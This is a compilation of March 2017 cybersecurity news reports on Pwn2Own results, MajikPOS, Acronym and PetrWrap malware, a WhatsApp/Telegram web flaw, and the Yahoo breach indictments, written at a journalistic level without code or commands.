Bug bounty hunters have managed to hack Microsoft Edge, Safari, Ubuntu and Adobe Reader on the first day of the Pwn2Own 2017 competition taking place these days alongside the CanSecWest conference in Vancouver, Canada.

The prize pool for this year’s event is $1 million and 11 teams have signed up to hack products in four categories. On the first day of the competition, participants earned a total of $233,000 for the exploits they disclosed.

A researcher from Chinese security firm Qihoo360 earned $50,000 for hacking Adobe Reader on Windows. The hacker leveraged remote code execution and information disclosure vulnerabilities in Windows, and a JPEG2000 heap overflow in Reader to complete the task.

Adobe Reader was also cracked by Team Sniper from Tencent Security, which exploited use-after-free and information disclosure flaws to achieve code execution, and a use-after-free in the kernel to obtain SYSTEM-level permissions. The team earned $25,000 for its exploits.

Researchers Samuel Groß and Niklas Baumstark earned $28,000 for hacking Apple’s Safari web browser using a combination of a use-after-free flaw, three logic bugs and a null pointer dereference. Their attempt was only partially successful, but they did earn style points for displaying a special message on the targeted Mac’s touch bar.

The Beijing-based Chaitin Security Research Lab earned $35,000 for gaining root access to a Mac through Safari. The team exploited six flaws, including one information disclosure, four type confusions and a use-after-free.

The same team also successfully hacked Ubuntu Desktop via a heap out-of-bounds access in the Linux kernel, which earned them $15,000. It’s worth noting that this is the first Pwn2Own where participants get rewarded for finding local privilege escalation vulnerabilities.

The highest reward of the first day, $80,000, was earned by Tencent Security’s Team Ether, which managed to hack Microsoft’s Edge browser using an arbitrary write bug in Chakra and a logic bug to escape the sandbox.

Each of these contestants also earned Master of Pwn points, and the researcher or team with the highest total will receive 65,000 ZDI reward points, which are worth roughly $25,000.

Team Ether had signed up to hack Windows as well, but they withdrew the entry. Researcher Ralf-Philipp Weinmann, who targeted Edge, also withdrew his entry. Richard Zhu and Team Sniper failed to hack Safari and Google Chrome, respectively, in the allocated timeframe.


New MajikPOS Malware targets users in across North America and Canada
16.3.2017 securityaffairs Virus

Trend Micro has discovered a new PoS malware, tracked as MajikPOS, that is targeting business in North America and Canada.
Security experts at Trend Micro have discovered a new PoS malware, tracked as MajikPOS, that is targeting business in North America.

The experts explained that the MajikPOS has the same capabilities of any other PoS malware, but it features an interesting modular approach in execution.

The first attacks powered with MajikPOS were observed at the end of January 2017, the malicious code borrows features from PoS malware and remote access Trojan (RAT).

“We’ve uncovered a new breed of point-of-sale (PoS) malware currently affecting businesses across North America and Canada: MajikPOS (detected by Trend Micro as TSPY_MAJIKPOS.A).” reads the analysis shared by Trend Micro.”Like a lot of other PoS malware, MajikPOS is designed to steal information, but its modular approach in execution makes it distinct. “

In the past researchers have observed other PoS malware with multiple components that are tasked of differed features (i.e. FastPOS (its updated version), Gorynych, ModPOS), but according to Trend Micro the MajikPOS’s modular structure is quite different. MajikPOS needs only another component from the server to conduct its RAM scraping routine.

MajikPOS is written using the “.NET framework” and uses encrypted communication channel to avoid detection.

The crooks did not use sophisticated techniques to compromise the targets, they were able to gain access to the PoS systems through brute-force attacks on Virtual Network Computing (VNC) and Remote Desktop Protocol (RDP) services protected by easy-to-guess passwords.

In some cases, the cyber criminals used Command-line FTP (File Transfer Protocol) or a modified version of Ammyy Admin to install the MajikPOS malware.

In some cases, attackers have used RATs previously installed on the system, the researchers noticed that in several attacks RATs were installed on the targets’ machines between August and November 2016.

Giving a look at other MajikPOS tricks, the experts noticed that its operators utilized commonly used lateral movement hacking tools to gain access to other systems in the host network.

Once installed on a machine, the malicious code connects to the C&C server and receives a configuration file with three entries to be used later.

Below an image of the C&C panel that is called Magic Panel.

MajikPOS C2 Panel

The RAM scraping component of the threat is called Conhost.exe, it scans the memory searching for card data of the major card issuers, including American Express, Diners Club, Discover, Maestro, Mastercard, and Visa.

It verifies the credit card’s track data and then sends it to the C&C server via HTTP POST.

“After verifying the credit card’s track data, the information is sent to the C&C server via HTTP POST, Action=”bin”.” continues the post published by Trend Micro.

Further investigation allowed the experts to discover that the registrant for the Magic Panel servers also registered many other websites used to sell stolen credit card data.

According to Trend Micro the websites managed by the gang behind the threat currently offers around 23,400 stolen credit card tracks for sale, priced between $9 and $39, depending on the type of card. The crooks also offer bulk packages of card composed of 25, 50, and 100 units, that are priced at $250, $400, and $700, respectively.

“Some of these websites were advertised on carding forums as early as February 2017 by a user called “MagicDumps”, who has been updating the forums for new dumps based on location—mostly in the U.S. and Canada.” added Trend Micro.

As a mitigation strategy, experts suggest properly configured chip-and-pin credit cards with end-to-end encryption, unfortunately, many merchants still haven’t implemented the PIN part of the chip-and-PIN process.


Two Russian former FSB agents and two hackers indicted for 2014 Yahoo data breach
16.3.2017 securityaffairs BigBrothers

The US authorities charged two former Russian FSB agents and two hackers for 2014 Yahoo data breach that caused the exposure of 500 Million Yahoo Accounts.
Last year it was disclosed the news of the 2014 Yahoo data breach that compromised over 500 million Yahoo user accounts.

At the time of the public disclosure made by Yahoo, the representatives of the company added that security experts suspect the involvement of nation-state actors.

“We have confirmed that a copy of certain user account information was stolen from the company’s network in late 2014 by what it believes is a state-sponsored actor. The account information may have included names, email addresses, telephone numbers, dates of birth, hashed passwords (the vast majority with bcrypt) and, in some cases, encrypted or unencrypted security questions and answers.” reads the security notice issued by Yahoo.

“The ongoing investigation suggests that stolen information did not include unprotected passwords, payment card data, or bank account information; payment card data and bank account information are not stored in the system that the investigation has found to be affected. Based on the ongoing investigation, Yahoo believes that information associated with at least 500 million user accounts was stolen and the investigation has found no evidence that the state-sponsored actor is currently in Yahoo’s network. Yahoo is working closely with law enforcement on this matter.”

The US authorities have charged two Russian intelligence officers and two criminal hackers of have taken part in 2014 Yahoo hack.

The four defendants are:

Dmitry Aleksandrovich Dokuchaev, 33 — an officer in the FSB Center for Information Security at the time of the hack, and now Russian national and resident.
Igor Anatolyevich Sushchin, 43 — an FSB officer, a superior to Dokuchaev within the FSB, and Russian national and resident.
Alexsey Alexseyevich Belan, aka “Magg,” 29 — a Russian national and resident, who has been on the FBI’s Most Wanted Hackers list.
Karim Baratov, aka “Kay,” “Karim Taloverov” and “Karim Akehmet Tokbergenov,” 22 — a Canadian and Kazakh national and a resident of Canada.
The members of the group are charged of:

Conspiring to commit computer fraud and abuse
Conspiring to engage in and the theft of trade secrets
Conspiring to engage in and committing economic espionage
Conspiring to commit wire fraud
Counterfeit access device fraud
Counterfeit access device making equipment
Aggravated identity theft
Transmitting code with the intent to cause damage to computers
Unauthorized access to a computer for obtaining information for commercial advantage and private financial gain
“A grand jury in the Northern District of California has indicted four defendants, including two officers of the Russian Federal Security Service (FSB), for computer hacking, economic espionage and other criminal offenses in connection with a conspiracy, beginning in January 2014, to access Yahoo’s network and the contents of webmail accounts.” the Department of Justice announced yesterday.

According to the prosecutors, the hackers accessed at least 30 million accounts as part of a spam campaign aimed to steal the email contents of thousands of people.

2014 Yahoo data breach

According to the indictment, Belan downloaded the Yahoo database, an archive containing usernames, recovery e-mail accounts, phone numbers as well as “certain information required to manually create, or “mint,” account authentication web browser “cookies” for more than 500 million Yahoo accounts.”
Once obtained the information, the hackers used it to gain unauthorized access to the contents of accounts at other webmail providers, including Google. Russian and American officials, Russian journalists, employees of financial services and other businesses were privileged targets of the gang.

The United States authorities have requested extradition for all the suspects arrested in Russia, but it’s difficult due to the absence of extradition treaty with Russia.Let’s close with a note on the hackers, according to the Assistant Attorney General Mary McCord they were not involved in the DNC hack.


New Acronym Malware Possibly Linked to Potao

15.3.2017 securityweek Virus
Researchers at Arbor Networks have come across a new piece of malware that could be linked to the Trojan used in the campaign known as Operation Potao Express.

The malware caught the attention of Arbor Networks researchers after a link to a VirusTotal analysis was posted on Twitter by an Italy-based expert who uses the online moniker Antelox. An analysis of the Trojan and its dropper showed that the threat could be linked to the Potao malware family.

The Potao malware, which has been described as a “universal modular cyber espionage toolkit,” has been around since at least 2011, but it was first analyzed in detail in 2015 by ESET.

In its report on Operation Potao Express, ESET said the malware was most probably of Russian origin and it had been used in attacks aimed at entities in Ukraine, Russia, Georgia and Belarus, including what experts described as “high-value targets.”

The new malware that Arbor Networks believes may be linked to Potao has been dubbed “Acronym” based on a debugging string and the URLs pointing to command and control (C&C) servers. Acronym and its dropper appear to have been compiled in mid-February.

The dropper is designed to kill the wmpnetwk.exe Windows process and replace the legitimate wmpnetwk.exe file with the malware.

Once executed, Acronym uses the Registry or the Task Scheduler to ensure that it’s persistent. It then contacts a C&C server and sends it information about the infected machine.

Similar to Potao, Acronym is a modular malware. Its built-in commands allow attackers to capture screenshots, download and execute other files, and run plugins. Since the C&C servers were offline at the time of Arbor’s analysis, researchers have not been able to identify any of the plugins.

However, similarities in the plugin functionality have led experts to believe that Acronym may be connected to Potao. Other similarities include the use of the same C&C infrastructure, attempts to contact C&C domains on the same ports, and the use of temporary file names that start with “HH.”

On the other hand, there are several differences when it comes to encryption and how the malware is delivered – unlike Potao, Acronym’s dropper does not use decoy documents, DLL files or process injections. Furthermore, some parts of the Acronym code, including for HTTP communications, encryption and the screenshot functionality, appear to have been copied from publicly available examples.

“As usual with new malware it is too soon to assess how active and widespread this new family will become, but it does have a potential link to a long running malware campaign known as Operation Potao Express that makes it worth watching,” said Arbor Networks’ Dennis Schwarz.


WhatsApp, Telegram Patch Account Hijacking Vulnerability

15.3.2017 securityweek Vulnerebility
A vulnerability found in the web versions of WhatsApp and Telegram could have been exploited to hijack accounts by sending the targeted user a malicious HTML file disguised as an image or a video.

The flaw was discovered by researchers at Check Point earlier this month and it was quickly patched by both Telegram and WhatsApp on the server side.

According to experts, an attacker could have leveraged the vulnerability to take complete control of a user’s account, including personal and group conversations, photos, videos and contact list. The hacker could have not only stolen information, but also interact with the victim’s contacts (e.g. send spam, hijack their accounts using the same method).

Telegram and WhatsApp allow users to send various types of files to their contacts, including documents, audio files, videos and images. Users are normally blocked from sending unauthorized file types, but researchers have found a way to bypass restrictions and upload a malicious HTML file by manipulating its MIME type and making it appear as an authorized file.

Once the user opens the fake image or the fake video in a new browser tab, local storage data associated with the instant messaging applications is sent to the attacker, allowing them to take control of the account.

“In order to do that, the attacker creates a JavaScript function that will check every 2 seconds if there is new data in the backend, and replace local storage with the victim’s local storage,” researchers explained.

In the case of WhatsApp, the victim is normally alerted if there is more than one active session. However, the attacker’s malicious code could have caused the victim’s browser window to get stuck. The hacker could have maintained access to the victim’s account until they logged out – simply closing the browser did not lock the attacker out.

Telegram allows multiple active sessions, which means the victim is not alerted if an unauthorized user logs in to their account at the same time.


Petya-Based PetrWrap Ransomware Emerges

15.3.2017 securityweek Virus
A newly observed ransomware family is leveraging the well-known Petya ransomware to encrypt user data, but modifies the malware “on the fly” to control its execution, Kaspersky Lab researchers discovered.

Petya emerged in March last year, when it caught researchers’ attention because it could manipulate the Master Boot Record (MBR) to take over the machine, instead of encrypting users’ files, as other ransomware does. Soon, Petya teamed with another threat, the Mischa ransomware, and together they evolved into a Ransomware-as-a-Service (RaaS).

Dubbed PetrWrap (Trojan-Ransom.Win32.PetrWrap), the new ransomware uses Petya for its nefarious purposes, but isn’t based on the RaaS. The malware is being distributed manually: the actors behind it target an organization’s network, compromise it, then use the legitimate PsExec tool to install the ransomware on all endpoints and servers.

Written in C and compiled in Microsoft Visual Studio, the new malware packs a special module that allows it to use a sample of the Petya ransomware v3 to infect the target machines, but also to modify the code of Petya in runtime to control its execution. The threat also features its own cryptographic routines, Kaspersky’s Anton Ivanov and Fedor Sinitsyn explain.

After launch, PetrWrap delays its execution for one hour and a half, after which it decrypts the main DLL of Petya from its data section and prepares to call its exported function ZuWQdweafdsg345312. Petya uses this function to get ready for the next operations and to start the MBR overwrite process. Because it needs to hook a couple of Petya’s functions first, PetrWrap prevents the malware from proceeding on its own.

Next, the malware makes the necessary cryptographic computations, hooks two Petya procedures, and then passes the execution to Petya. PetrWrap completely replaces the ECDH part of Petya with an independent implementation, which allows it to use its own private and public keys. The ransomware comes with an embedded public key, generates a pair of session keys for each infection, computes ecdh_shared_digest, intercepts Petya’s salsa key and encrypts it using ecdh_shared_digest, constructs a user_id, and then passes the ID to Petya, which uses it as if it was its own data.

PetrWrap hooks two of Petya’s procedures and replaces them with its own procedures, which allows it to save the salsa key generated by Petya for further use; patch the Petya bootloader code and ransom text; pass execution to the original procedure; call the original procedure; generate the user_id; and replace Petya’s id string with this newly generated user_id.

All these changes allow PetrWrap to lock the victim’s machine and securely encrypt the MFT of NTFS partitions and to show a lockscreen that has no mention of Petya (it also lacks the flashing skull animation). Moreover, the approach allows PetraWrap developers to encrypt the bootloader without having to write their own code.

Because this family of ransomware uses a strong encryption algorithm, there’s no free decryption tool available to help victims. According to Kaspersky, however, victims can try restoring their files using third-party tools such as R-Studio.

“Targeted attacks on organizations with the main aim of encrypting data are becoming more popular. The groups using ransomware in their targeted attacks usually try to find vulnerable servers or servers with unprotected RDP access. After penetrating an organization’s network they use special frameworks like Mimikatz to obtain the necessary credentials for installing ransomware throughout the network,” Kaspersky concludes.


New MajikPOS Malware Targets North American Businesses

15.3.2017 securityweek Virus
A newly discovered point-of-sale (PoS) malware featuring a modular approach in execution is currently targeting businesses in North America, Trend Micro researchers warn.

Dubbed MajikPOS, the malware is capable of stealing information from the compromised systems, just as other POS threats do, but its modular approach sets it apart. MajikPOS’s initial attacks reportedly started at the end of January 2017.

Named after its command and control (C&C) panel, the malware “needs only another component from the server to conduct its RAM scraping routine,” Trend Micro says. The security researchers also reveal that MajikPOS’s operators use a combination of PoS malware and remote access Trojan (RAT) to attack their targets.

The actors illicitly gain access to the victims’ endpoints using Virtual Network Computing (VNC) and Remote Desktop Protocol (RDP), along with easy-to-guess username and password combinations. Command-line FTP (File Transfer Protocol), and sometimes a modified version of Ammyy Admin (named VNC_Server.exe or Remote.exe, only the file manager capability was used) were also abused to install MajikPOS. The tools used in these attacks were usually downloaded from free file-hosting sites.

First, the attackers fingerprint their targets, after which they attempt to gain access using generic credentials or via brute force. In some cases, they used RATs previously installed on the system. Common to these attacks was the fact that the RATs were installed on the victims’ machines between August and November, 2016.

MajikPOS was written using the .NET framework, uses encrypted communication to avoid detection, and leverages open RDP ports for intrusion, the same as other related threats, such as Operation Black Atlas. In some instances, the malware’s operators used common lateral movement hacking tools, which suggest they attempted to gain further access to the victim’s network.

After installation, the malware contacts its C&C server to register the infected system, and to receive a configuration file with three entries to be used in later steps. The C&C panel on the server is called Magic Panel, and the researchers discovered two of them.

MajikPOS’s RAM scraping component is called Conhost.exe and is responsible for finding credit card data on the victim’s machine. The malware seeks information on cards such as American Express, Diners Club, Discover, Maestro, Mastercard, and Visa. It verifies the credit card’s track data and then sends it to the C&C server via HTTP POST.

In addition to the Magic Panel servers, the researchers also managed to tie to the same registrant a series of websites used to sell stolen credit card information, as well as a couple of C&C panels for the malware. At the moment, the actor has around 23,400 stolen credit card tracks up for sale, priced between $9 and $39, depending on the type of card. Card data is available in bulk packages of 25, 50, and 100, priced at $250, $400, and $700, respectively.

Last month, a user called “MagicDumps” has been advertising some of these websites on carding forums, and Trend Micro notes that the same person has been also updating the forums for new dumps based on location, mostly in the U.S. and Canada.

“In separate incidents, we saw a command-line tool abused to deploy MajikPOS, along with other PoS malware. MajikPOS is also notable with how it tries to hide by mimicking common file names in Microsoft Windows,” researchers say, adding that the threat “is a reflection of the increasing complexity that bad guys are predicted to employ in their malware to neuter traditional defenses.”

According to Trend Micro, properly configured chip-and-pin credit cards with end-to-end encryption (Europay, MasterCard and Visa - EMVs) shouldn’t be affected by the threat, but terminals that don’t support them are at risk. U.S. has adopted EMVs following the implementation of the EMV Liability Shift in October 2015, which resulted in an increase in online fraud in the country.

“While businesses and consumers across the country are increasingly deploying and using chip-based PoS terminals, many merchants, for instance, still haven’t implemented the PIN part of the chip-and-PIN process. Although the use of EMV Chip-and-PIN credit cards is not a silver bullet, EMVs are still a more secure alternative compared to magnetic stripe-based credit cards that are most affected by PoS malware like MajikPOS,” Trend Micro says.


U.S. Government Indicts Two Russian FSB Officers Over Yahoo Hack

15.3.2017 securityweek BigBrothers
U.S. Government Indicts Four Over 2014 Yahoo Hack, Including Two Russian FSB Officers

The US government today announced the indictment of four individuals charged with computer hacking, economic espionage and other offenses in connection with the 2014 breach of Yahoo that involved the theft of information on at least 500 million user accounts. Three of the accused are Russian nationals currently living in Russia. The fourth, Karim Baratov, is a Canadian and Kazakh national who was arrested in Canada on Tuesday.

Two of the Russian nationals, Dmitry Aleksandrovich Dokuchaev and Igor Anatolyevich Sushchin are serving officers of the Russian Federal Security Service (FSB). In announcing the indictments, Acting Assistant Attorney General Mary McCord of the National Security Division made it clear that the US believes they were acting in their capacity as FSB officers.

The third Russian national is Alexsey Alexseyevich Belan. This is not the first time he has been indicted by the US. He was indicted on different charges in 2012 and 2013, and is on the FBI's 'Cyber Most Wanted' List. He is currently the subject of an Interpol Red Notice. He was arrested in a European country in June 2013, but managed to escape to Russia before he could be extradited to the US.

The belief is that the FSB officers employed cyber criminals (Belan and Baratov) to do the hacking. It suspects that the FSB's primary objective was espionage. Targets included the private accounts of Russian journalists; Russian and U.S. government officials; and employees of a prominent Russian cybersecurity company. The two non-FSB cyber criminals then used the stolen data for more traditional criminal activities.

"We've known for some time that spies have targeted email accounts as a primary vector to collect information," comments Eric O'Neill, a former FBI counter-terrorism operative who helped capture Russian spy Robert Hanssen -- and now national security strategist with Carbon Black. "Global communications, both personal and business, often rely on email as the first method of communication. This creates a detailed record that can be used for a variety of purposes. Infiltration into email accounts allows spies to collect credentials that provide access to targeted systems. Monitoring government agency systems informs policy decisions, collects information on defense and attack capability, and can provide an economic boost to foreign nations."

Belan also obtained access to Yahoo's Account Management Tool. Used in conjunction with the stolen account database, he and the FSB officers were able to locate Yahoo email accounts of interest and manually create cookies to allow unauthorized access to at least 6,500 accounts.

In a separate statement today, Yahoo commented, "the U.S. Department of Justice announced the indictment of four defendants, two Russian intelligence officers and two state-sponsored hackers, for the theft of Yahoo user data in late 2014, as well as cookie forging to obtain access to user accounts on our network in 2015 and 2016." Yahoo has always maintained its original position that the hack had been state-sponsored, and it is now vindicated.

"We appreciate the FBI's diligent investigative work and the DOJ’s decisive action to bring to justice those responsible for the crimes against Yahoo and its users." For its part, the government acknowledged the help of both Yahoo and Google in its investigations, and also acknowledged help from the Canadian authorities and the UK's MI5.

The US hopes, and (officially) expects the three Russians be turned over to the US for trial. "We would hope they would respect our criminal justice system, and respect these charges, and what they need to do," said McCord.

The reality is there is no extradition treaty with Russia, and this is unlikely to happen. Russia has already ignored two requests on Belan, and a third is expected to be issued tomorrow.

"Instead of detaining him [Belan, under the Red Notice] the FSB officers used him to break into Yahoo's networks. Meanwhile, Belan used his relationship with the two FSB officers and his access to Yahoo to commit additional crimes to line his pockets with money," said McCord.

Belan used his access to steal financial information such as gift card and credit card numbers from webmail accounts; to gain access to more than 30 million accounts whose contacts were then stolen to facilitate a spam campaign; and to earn commissions from fraudulently redirecting a subset of Yahoo’s search engine traffic.

The indictment of two Russian security officers will undoubtedly put further pressure on already strained US/Russian relations.

Asked if it would be possible to maintain a good working relationship with the FSB following these indictments, McCord replied, "I think that is a challenge. It is something we will continue to look at. I think this case is going to be a great test of that."

"Any indictment of Russia by the US DOJ will likely be met with recrimination and denial," adds O'Neill. "Russia will likely use the same playbook that China used when we charged five Chinese military spies for cyber espionage against U.S. corporations and a labor organization in 2014... China vehemently denounced the indictment and stated that the US used 'fabricated facts' and that it 'grossly violates the basic norms governing international relations and jeopardizes China-U.S. cooperation'."

“These accounts contain a tremendous amount of personal information, including personally identifiable information, financial account passwords, workplace account passwords, information about investments and financial issues, or details around the workplace projects and business plans of CEOs, attorneys, and high net worth investors, as well as politicians, military officers, or other government officials,” Steve Grobman, Intel Security’s CTO, told SecurityWeek.

“The public disclosure of such material could be sensitive enough to destroy careers, enable blackmail, endanger a mission, or influence high-level negotiations and decisions. The weaponization of such information in the realm of economic espionage presents unlimited opportunities for monetization," Grobman added.


US Charges Two Russian Spies & Two Hackers For Hacking 500 Million Yahoo Accounts
15.3.2017 thehackernews BigBrothers

The 2014 Yahoo hack disclosed late last year that compromised over 500 million Yahoo user accounts was believed to be carried out by a state-sponsored hacking group.
Now, two Russian intelligence officers and two criminal hackers have been charged by the US government in connection with the 2014 Yahoo hack that compromised about 500 million Yahoo user accounts, the Department of Justice announced Wednesday.
According to the prosecutors, at least 30 million accounts were accessed as part of a spam campaign to access the email contents of thousands of people, including journalists, government officials, and technology company employees.
The four defendants — Two officers from the Russian Federal Security Service (FSB) and two other hackers — are identified as:
Dmitry Aleksandrovich Dokuchaev, 33 — an officer in the FSB Center for Information Security at the time of the hack, and now Russian national and resident.
Igor Anatolyevich Sushchin, 43 — an FSB officer, a superior to Dokuchaev within the FSB, and Russian national and resident.
Alexsey Alexseyevich Belan, aka "Magg," 29 — a Russian national and resident, who has been on the FBI’s Most Wanted Hackers list and indicted twice in 2012 and 2013 by U.S. Federal grand juries for hacking and fraud charges.
Karim Baratov, aka "Kay," "Karim Taloverov" and "Karim Akehmet Tokbergenov," 22 — a Canadian and Kazakh national and a resident of Canada.
In a 38-page indictment [PDF] unsealed Wednesday, the prosecutors said the two Russian spies worked with two other hackers to break into and gained initial access to Yahoo in early 2014.
Belan, who is on the FBI's most-wanted cybercriminals list, used the file transfer protocol (FTP) to download the Yahoo database, containing usernames, recovery e-mail accounts, phone numbers as well as "certain information required to manually create, or "mint," account authentication web browser “cookies” for more than 500 million Yahoo accounts."
The spies then used the stolen information to obtain unauthorized access to the contents of accounts at Yahoo, Google and other webmail providers, including those of Russian and American officials, Russian journalists, employees of financial services and other businesses.
The range of charges are officially listed as:
Conspiring to commit computer fraud and abuse
Conspiring to engage in and the theft of trade secrets
Conspiring to engage in and committing economic espionage
Conspiring to commit wire fraud
Counterfeit access device fraud
Counterfeit access device making equipment
Aggravated identity theft
Transmitting code with the intent to cause damage to computers
Unauthorized access to a computer for obtaining information for commercial advantage and private financial gain
Baratov was arrested on Tuesday by the Toronto Police Department, while Belan and the two FSB officers are in Russia. The United States has requested all the three to be handed over to face charges, but the US has no extradition treaty with Russia.
Meanwhile, Assistant Attorney General Mary McCord said that there was no connection between the Wednesday indictment and the investigation into the hacking of the Democratic National Committee (DNC) last year.
The news of the arrest came few weeks after Yahoo and Verizon Communications Inc. agreed to reduce the price of the upcoming acquisition deal by $350 Million in the wake of the two data breaches.
The deal, which was previously finalized at $4.8 Billion, now valued at about $4.48 Billion in cash and is expected to close in the second quarter.